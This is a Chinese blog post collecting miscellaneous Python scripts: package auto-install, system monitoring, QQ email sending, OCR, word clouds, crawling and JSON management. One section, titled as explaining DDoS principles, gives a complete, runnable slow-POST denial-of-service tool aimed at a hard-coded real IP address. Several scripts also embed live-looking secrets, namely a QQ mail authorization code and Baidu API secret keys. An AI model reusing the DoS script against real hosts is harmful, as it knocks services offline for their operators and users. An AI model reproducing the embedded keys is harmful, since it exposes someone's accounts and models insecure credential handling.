【python】python脚本

自动安装外部依赖包

import os
import time
def auto_install_package(packages_name_list):
    installed_package = list()
    not_installed_package = list()
    p = os.popen("pip3 list")  # 获取所有包名 直接用 pip list 也可获取
    pip_list = p.read().lower()  # 读取所有内容
    for package_name in packages_name_list:
        if package_name.lower() in pip_list:
            installed_package.append(package_name)
        else:
            not_installed_package.append(package_name)

    if len(installed_package) != 0:
        for package_name in installed_package:
            print("[INFO] 依赖包 {} 已存在!".format(package_name))
    else:
        print("[INFO] 未检测到任何已安装依赖包!")

    if len(not_installed_package) != 0:
        for package_name in not_installed_package:
            print("[INFO] 检测到 {} 包未安装 正在自动安装中...".format(package_name))
            start_time = time.time()
            p = os.popen("pip3 install {} -i https://pypi.douban.com/simple/".format(package_name))
            if "Success" in p.read():
                spend_time = time.time() - start_time
                print("[INFO Spend_time:{}s] 依赖包 {} 安装成功!".format(round(spend_time,2),package_name))
            else:
                print('[INFO] 依赖包 {} 安装失败! {}'.format(package_name,p.read()))
    else:
        print("[INFO] 引入的全部依赖包已存在!")
auto_install_package(["matplotlib","wget"])
import matplotlib
import wget

获取系统信息和运行状态

import os
def auto_install_package(packages_name_list):
    p = os.popen("pip3 list")  # 获取所有包名 直接用 pip list 也可获取
    pip_list = p.read()  # 读取所有内容
    for package_name in packages_name_list:
        if package_name.lower()in pip_list or package_name.title()in pip_list:
            print("[PACKAGE_INFO]已存在外部依赖包 {}".format(package_name))
            os.system("cls")

        else:
            print("[PACKAGE_INFO]检测到{}包未安装 正在自动安装中...".format(package_name))
            p = os.popen("pip3 install {}".format(package_name))
            if "Success" in p.read():
                print("[PACKAGE_INFO]依赖包{}安装成功!".format(package_name))
auto_install_package(["psutil","requests"])
import psutil
import datetime
import platform
import time
import re
import requests


def get_ip_info():
    res1 = requests.get('http://httpbin.org/ip')
    ip = re.findall('"origin": "(.*?), .*?"', res1.text)[0]
    res2 = requests.get('https://www.hao7188.com/ip/{}.html'.format(ip))
    ip_dress_data = re.findall('<span>(.*?)</span>', res2.text)[2]

    return ip,ip_dress_data
def io_get_bytes(sent=False, recv=False):
    internet = psutil.net_io_counters()
    if internet == None:
        return None
    io_sent = internet.bytes_sent
    io_recv = internet.bytes_recv
    if sent == True and recv == True:
        return [io_sent, io_recv]
    elif sent == True:
        return io_sent
    elif recv == True:
        return io_recv
    else:
        return None


print("************************************************")
print("*               系统检测工具                   *")
print("************************************************")
try:
    net_io = psutil.net_io_counters()
    net_in = psutil.net_io_counters(pernic=True)
    print('[网络信息]')
    print("--------------------------------------------------------")
    print("IP地址:  {}".format(get_ip_info()[0]))
    print("地理位置:", get_ip_info()[1])
    print(f'发送流量: {round(net_io.bytes_sent/1024**2)}M')
    print(f'接收流量: {round(net_io.bytes_recv/1024**2)}M')
    print(f'发送数据包: {round(net_io.packets_sent/1024**1)}')
    print(f'接收数据包: {round(net_io.packets_recv/1024**1)}')
    print("--------------------------------------------------------")
except Exception as e:
    print("网络检测错误:{}".format(e))
try:
    print('[磁盘情况]')
    print("--------------------------------------------------------")
    for i in range(len(psutil.disk_partitions())):
        disk=psutil.disk_partitions()[i].device
        print(psutil.disk_partitions()[i].device)
        print(f"磁盘空间: {round(psutil.disk_usage(disk).used/1024**3)}/{round(psutil.disk_usage(disk).total/1024**3)}G {round(psutil.disk_usage(disk).percent)}%")
        print(f"磁盘可用: {round(psutil.disk_usage(disk).free/1024**3)}G")
    print("--------------------------------------------------------")
except Exception as e:
    print("磁盘检测错误: {}".format(e))
try:
    print("[系统信息]")
    print("--------------------------------------------------------")
    print(f"当前用户: {psutil.users()[0][0]}")
    print(f"电脑名: {platform.node()}")
    print(f"系统版本: {platform.platform()}")
    print(f"CPU核心数: {psutil.cpu_count(logical=False)}")
    print(f"CPU型号: {platform.processor()}")
    print(f"开机时间: {datetime.datetime.fromtimestamp(psutil.users()[0][3])}")
    print(f"运行时间: {datetime.datetime.now()-datetime.datetime.fromtimestamp(psutil.users()[0][3])}")
    print("--------------------------------------------------------")
except Exception as e:
    print("系统检测错误:{}".format(e))


interval = 1  # 每隔 interval 秒获取一次网络IO信息, 数值越小, 测得的网速越准确
unit='s' #时间单位

k = 1024  # 一 K 所包含的字节数
m = 1048576  # 一 M 所包含的字节数
while True:
    byteSent1 = io_get_bytes(sent=True)  # 获取开机以来上传的字节数
    byteRecv1 = io_get_bytes(recv=True)  # 获取开机以来下载的字节数
    time.sleep(interval)  # 间隔 interval 秒
    byteSent2 = io_get_bytes(sent=True)  # 再次获取开机以来上传的字节数
    byteRecv2 = io_get_bytes(recv=True)  # 再次获取开机以来下载的字节数
    sent = byteSent2 - byteSent1  # interval 秒内所获取的上传字节数
    recv = byteRecv2 - byteRecv1  # interval 秒内所获取的下载字节数



    if sent > m:
        sent = sent / m
        sent_unit = 'M/' + unit
    elif sent > k:
        sent = sent / k
        sent_unit = 'K/' + unit
    elif sent >= 0:
        sent_unit = 'B/' + unit


    if recv > m:
        recv = recv / m
        recv_unit = 'M/'  + unit
    elif recv > k:
        recv = recv / k
        recv_unit = 'K/'  + unit
    elif recv >=0:
        recv_unit = 'B/'  + unit
    #
    cpu_percent=psutil.cpu_percent()
    #内存消耗百分比
    memory_spend_percent=psutil.virtual_memory().percent
    #内存消耗
    memory_spend_sum=round(psutil.virtual_memory().used/1024**2)
    #内存总量
    memory_all_sum=round(psutil.virtual_memory().total/1024**2)
    #内存空闲
    memory_free_sum=round(psutil.virtual_memory().free/1024**2)

    print(f'\r[上传速度]: {round(sent,2)} {sent_unit} [下载速度]: {round(recv,2)} {recv_unit} [CPU使用率]:{cpu_percent}% [内存占用]: {memory_spend_percent}%({memory_spend_sum}/{memory_all_sum}M)',end="")

QQ邮箱自动化

import smtplib,time
from email.mime.text import MIMEText
host_server='smtp.qq.com'                 #QQ邮件的smtp主机
sender='[email protected]'                 #发送者邮箱
sender_pwd='gtzlpasfrzbubeeh'             #发送者密码或秘钥
receiver='[email protected]'                #收信人邮箱
mail_content="需要发送的文本消息"            #发送的内容
mail_title='这是一封python发的邮件'          #信件标题
msg=MIMEText(mail_content)                #生成文本消息对象
msg['Subject']=mail_title
msg['From']='浪子与诗'                     #发送者显示名称
msg['To']=receiver                        #接受者显示名称
smtp=smtplib.SMTP_SSL(host_server,465)
smtp.login(sender,sender_pwd)
smtp.sendmail(sender,receiver,msg.as_string())
smtp.quit()
print('To:{} 邮箱发送成功!'.format(receiver))

文本统计生成词云图片

import wordcloud
import jieba

f=open("xx.txt","r",encoding="utf-8")
t=f.read()
f.close()
ls=jieba.lcut(t)
txt=" ".join(ls)
w=wordcloud.WordCloud(
	random_state=300,#配色方案数
	width=300,#图片宽度
	height=200,#图片高度
	background_color="white",#背景颜色
	max_words=20,#图片容纳最大词数
	font_path="simfang.ttf"#字体
	)
w.generate(txt)
w.to_file("xx.png")

批量图片识别

#安装外部依赖库 pip install baidu-aip
#脚本文件要和“图片”文件夹在同一个目录
#将需要录入的选择题图片放入“图片”文件夹后执行脚本
#录入完成后题目保存的文件为"识别结果.txt"
#api接口来源 百度AI平台
import os
from aip import AipOcr
def collect(img_dress):
    global sum
    try:
        cilent=AipOcr(appId="16678637",secretKey="4E4kUEyQvqnRqWTccPfjFWDspuXIyrga",apiKey="2UsI44XqxiquPPjxtHENUPgk")
        with open(img_dress,"rb") as f:
            image=f.read()
        print('文件:'+img_dress+' 开始录入...还剩:'+str(sum-1)+'张')
        data=cilent.basicAccurate(image)
        for i in range(len(data['words_result'])):
            line=data['words_result'][i]['words']
            with open('识别结果.txt','a') as f:
                f.write(line.replace('□','').replace('⊙','').replace('●','')+'\n')
                if i == len(data['words_result'])-1:
                    f.write('---------------------------------------------来自图片:'+os.path.basename(img_dress))
        print('录入成功!')
    except Exception as e:
        print(e)

all_imgname_list=os.listdir('图片')
print(all_imgname_list)
sum = len(all_imgname_list)
print('图片总数:' + str(len(all_imgname_list)))
for oneimg_name in all_imgname_list:
    collect('图片\\'+oneimg_name)
    sum-=1
print('全部识别录入任务已完成!')

DDOS原理

import socket
import time
import threading

# Pressure Test,ddos tool
# ---------------------------
MAX_CONN = 20000
PORT = 80
HOST = "122.190.3.227"
PAGE = "/?action=cal&randnum=0.20059459460011975"
# ---------------------------

buf = "POST {} HTTP/1.1\r\n"\
"Host: {}\r\n"\
"Content-Length: 10000000\r\n"\
"Cookie: dklkt_dos_test\r\n"\
"\r\n".format(PAGE, HOST)

socks = []


def conn_thread():
    global socks
    for i in range(0, MAX_CONN):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((HOST, PORT))
            s.send(buf.encode())
            print("Send buf OK!,conn=%d\n" % i)
            socks.append(s)
        except Exception as ex:
            print("Could not connect to server or send error:%s" % ex)
            time.sleep(10)


# end def

def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send(b"f")
            # print "send OK!"
            except Exception as ex:
                print("Send Exception:%s\n" % ex)
                socks.remove(s)
                s.close()
        time.sleep(1)


# end def

conn_th = threading.Thread(target=conn_thread, args=())
send_th = threading.Thread(target=send_thread, args=())


conn_th.start()
send_th.start()

python文件批量添加格式说明

import os
def add_charset(path,charset_mode):
    if isinstance(path,str) and isinstance(charset_mode,str):
        if charset_mode in ['utf-8']:
            with open(path,'r+',encoding='utf-8') as f1:
                data=f1.readlines()
                data.insert(0,'#-*- coding:{} -*-\n'.format(charset_mode))
                with open(path,'w',encoding='utf-8') as f2:
                    f2.writelines(data)
                    print("文件:{} 编码格式添加成功!".format(path))
def set_charset(dir_path,charset_mode):
    for rt, dirs, files in os.walk(dir_path):
        for f in files:
            path=rt+'\\'+f
            if path.endswith('.py'):
                add_charset(path,charset_mode)
set_charset(r"C:\Users\Mr.m\Desktop\QQ自动发卡机器人","utf-8")

获取项目目录依赖包

import os
def loop_walk(dir_path):
    filesname=[]
    package_list_list=[]
    package_list=[]
    package=[]
    for rt, dirs, files in os.walk(dir_path):
            for file in files:
                filesname.append(file)
                path=rt+'\\'+file
                if path.endswith('.py'):
                    package_list_list.append(get_require_package(path))
    for i in range(len(package_list_list)):
        for j in range(len(package_list_list[i])):
            package_list.append(package_list_list[i][j])
    destination_fname=list(map(lambda x:x.split('.py')[0],filesname))
    print(destination_fname)
    package_list=list(set(package_list))
    for package_name in package_list:
        if package_name not in destination_fname:
            package.append(package_name)
    return package

def get_require_package(path):
    packages_name_list=[]
    packages_name=[]
    with open(path,'r+',encoding='utf-8') as f:
        demo_list=f.readlines()
        for demo_line in demo_list:
            if 'import' in demo_line:
                demo_destination_list=demo_line.split(' ')
                for demo_name in demo_destination_list:
                    if demo_name not in ['from','import','as','.','*\n'] and not demo_name.startswith('..'):
                        packages_name_list.append(demo_name)
                        packages_name=list(map(lambda x:x.replace('\n',''),packages_name_list))
    return packages_name
local_package=loop_walk(r'C:\Users\Mr.m\Desktop\QQ自动发卡机器人')

二维码制作

from MyQR import myqr
import os

version, level, qr_name = myqr.run(
    words="http://qm.qq.com/cgi-bin/qm/qr?k=P878Xd3c4KMpImkLkTFFWzD1gitIyrlw",  # 可以是字符串,也可以是网址(前面要加http(s)://)
    version=2,  # 设置容错率为最高
    level='H',  # 控制纠错水平,范围是L、M、Q、H,从左到右依次升高
    picture="b1.gif",  # 将二维码和图片合成
    colorized=True,  # 彩色二维码
    contrast=1.0,  # 用以调节图片的对比度,1.0 表示原始图片,更小的值表示更低对比度,更大反之。默认为1.0
    brightness=1.0,  # 用来调节图片的亮度,其余用法和取值同上
    save_name="b2.gif",  # 保存文件的名字,格式可以是jpg,png,bmp,gif
    save_dir=os.getcwd()  # 控制位置
)

图片批量转文字

#安装外部依赖库 pip install baidu-aip
#脚本文件要和“图片”文件夹在同一个目录
#将需要录入的选择题图片放入“图片”文件夹后执行脚本
#录入完成后题目保存的文件为"识别结果.txt"
import os
from aip import AipOcr
def collect(img_dress):
    global sum
    try:
        cilent=AipOcr(appId="16678637",secretKey="4E4kUEyQvqnRqWTccPfjFWDspuXIyrga",apiKey="2UsI44XqxiquPPjxtHENUPgk")
        with open(img_dress,"rb") as f:
            image=f.read()
        print('文件:'+img_dress+' 开始录入...还剩:'+str(sum-1)+'张',end='')
        data=cilent.basicAccurate(image)
        for i in range(len(data['words_result'])):
            line=data['words_result'][i]['words']
            with open('识别数据.txt','a') as f:
                f.write(line.replace('□','').replace('⊙','').replace('●','')+'\n')
                if i == len(data['words_result'])-1:
                    f.write('来源:'+img_dress)
                    f.write('\n----------------------\n')
        print(' [+]录入成功!')
    except Exception as e:
        print(e)

all_imgname_list=os.listdir('图片')
print(all_imgname_list)
sum = len(all_imgname_list)
print('图片总数:' + str(len(all_imgname_list)))
for oneimg_name in all_imgname_list:
    collect('图片\\'+oneimg_name)
    sum-=1
print('----------------全部识别录入任务已完成!----------------')

python2代码批量转换为python3

#!/usr/bin/env python
import sys
from lib2to3.main import main

sys.exit(main("lib2to3.fixes"))

命令行执行python 2to3.py -w 文件地址/目录地址开始转换
注意:生成的python3代码会覆盖python2代码

json实现的关键字数据管理

import json
import os
#自动创建数据文件
if not os.path.exists('reply.json'):
    f = open('reply.json', 'w', encoding='utf-8')
    json.dump({'hello': '你好'}, fp=f, ensure_ascii=False)
    f.close()

#查看已定义回复内容
def all_key_reply():
    with open('reply.json', 'r', encoding='utf-8') as f:
        dic_data=json.load(fp=f)
        print("================================")
        print("[关键字]     [回复内容]")
        for k,v in dic_data.items():
            if isinstance(v,list):
                print(k+"\t\t\t"+"; ".join(v))
            elif isinstance(v,str):
                print(k+"\t\t\t"+v)
            else:
                print('存在错误数据!')
        print("================================")

#增加自定义回复内容
def add_key_reply(key,reply_content):
    if isinstance(key,str) and isinstance(reply_content,str):
        with open('reply.json', 'r', encoding='utf-8') as f:
            dic_data = json.load(fp=f)
            dic_data.setdefault(key,reply_content)
        with open('reply.json','w',encoding='utf-8') as f:
            json.dump(dic_data,fp=f,ensure_ascii=False)
            print('关键字添加成功!')


#删除自定义回复内容
def delete_key_reply(key):
    if isinstance(key,str):
        try:
            with open('reply.json', 'r', encoding='utf-8') as f:
                dic_data = json.load(fp=f)
                dic_data.pop(key)
            with open('reply.json', 'w', encoding='utf-8') as f:
                json.dump(dic_data, fp=f, ensure_ascii=False)
                print('关键字删除成功!')
        except KeyError:
            print('删除的关键字不存在!')

#修改自定义回复内容
def change_key_reply(key,new_reply_content):
    if isinstance(key,str) and isinstance(new_reply_content,str):
        try:
            with open('reply.json', 'r', encoding='utf-8') as f:
                dic_data = json.load(fp=f)
                dic_data[key]=new_reply_content
            with open('reply.json', 'w', encoding='utf-8') as f:
                json.dump(dic_data, fp=f, ensure_ascii=False)
                print('修改成功!')
        except KeyError:
            print('修改的关键字不存在!')


print('========自定义回复内容管理========')
print('1.查看全部关键字回复内容')
print('2.增加自定义回复内容')
print('3.删除自定义回复内容')
print('4.修改自定义回复内容')
while True:
    buttton=input('>>')
    if buttton == '1':
        all_key_reply()
    elif buttton == '2':
        key=input('请输入添加的关键字:')
        reply_content=input('请输入相应的回复内容:')
        add_key_reply(key,reply_content)
    elif buttton == '3':
        key=input('请输入要删除的关键字:')
        delete_key_reply(key)
    elif buttton == '4':
        key=input('请输入修改的关键字:')
        new_reply_content=input('请输入回复的内容:')
        change_key_reply(key,new_reply_content)
    else:
        print('输入有误!')

轻量级多线程爬虫

import requests
import re
import json
import threading
import queue
from lxml import etree
q=queue.Queue(20)

class Xspider(object,):
    def __init__(self,url,filename="json"):
        if isinstance(filename,str):
            self.filename=filename
        if isinstance(url,list):
            self.urls=url
        self.items=[]
        self.match_rules=[]
        self.f=open(self.filename,"w",encoding="utf-8")

    def set_spider(self,headers=None,proxies=None,params=None,cookies=None,allow_redirects=False,verify=True,timeout=5):
        self.headers=headers
        self.proxies=proxies
        self.params=params
        self.cookies=cookies
        self.allow_redirects=allow_redirects
        self.verify=verify
        self.timeout=timeout


    def add_item(self,itme_name,match_rule):
        self.items.append(itme_name)
        self.match_rules.append(match_rule)


    def get_html(self,url):
        res=requests.get(url)
        res.encoding="utf-8"
        q.put(res)

    def parse(self):
        all_matched_data=[]
        item_value_dic={}

        res = q.get()
        for match_rule in self.match_rules:
            html=etree.HTML(res.text)
            matched_data=html.xpath(match_rule)
            all_matched_data.append(matched_data)
        try:
            for j in range(len(all_matched_data[0][0])):
                for i,item in zip(range(len(all_matched_data[0])),self.items):
                    item_value=all_matched_data[i][j]
                    item_value_dic.update({item:item_value})
                print(item_value_dic)
                self.save_file(item_value_dic)
        except:
            pass

    def save_file(self,item_value_dic):
        self.f.write(json.dumps(item_value_dic,ensure_ascii=False)+'\n')

    def run(self):
        for url in self.urls:
            t1=threading.Thread(target=self.get_html,args=(url,))
            t2=threading.Thread(target=self.parse)
            t1.start()
            t2.start()

if __name__ == '__main__':

    urls=[]
    for i in range(1,200):
        urls.append('https://ke.qq.com/course/list?mt=1001&page={}'.format(i))

    xspider=Xspider(urls,filename="data.json")
    xspider.set_spider()
    xspider.add_item('标题','//li[contains(@class,"course-card-item")]/h4/a/text()')
    xspider.add_item('链接','//li[contains(@class,"course-card-item")]/a/@href')
    xspider.run()

远程内容自动更新到本地

# 将远程内容自动更新到本地模块
def auto_update(remote_content):
    if isinstance(remote_content,str):
        if not os.path.exists("recent.txt"):
            f=open("recent.txt","w",encoding="utf-8")
            f.close()
        with open("recent.txt","r",encoding="utf-8") as f:
            local_content=f.read()
        if remote_content != local_content:
            local_content = remote_content
            with open("recent.txt","w",encoding="utf-8") as f:
                f.write(local_content)
            print("[INFO {}] 内容同步成功!".format(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())))
        else:
            print("[INFO {}] 内容已是最新内容!".format(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())))

    else:
        raise Exception('参数错误!')

装饰器的使用

import threading
class Myclass():
    def __init__(self):
        self.funcs = dict()

    def gather(self,v):
        def decorator(f):
            if v == "ok":
                self.funcs[f] = v
            else:
                pass
        return decorator

    def run(self):
        for f,v in zip(self.funcs.keys(),self.funcs.values()):
            # print(f,v)
            f(v)

c = Myclass()
@c.gather('ok')
def _(v):
    print(1)

@c.gather('no')
def _(v):
    print(2)

c.run()
发布了82 篇原创文章 · 获赞 468 · 访问量 24万+

猜你喜欢

转载自blog.csdn.net/qq_44647926/article/details/98875468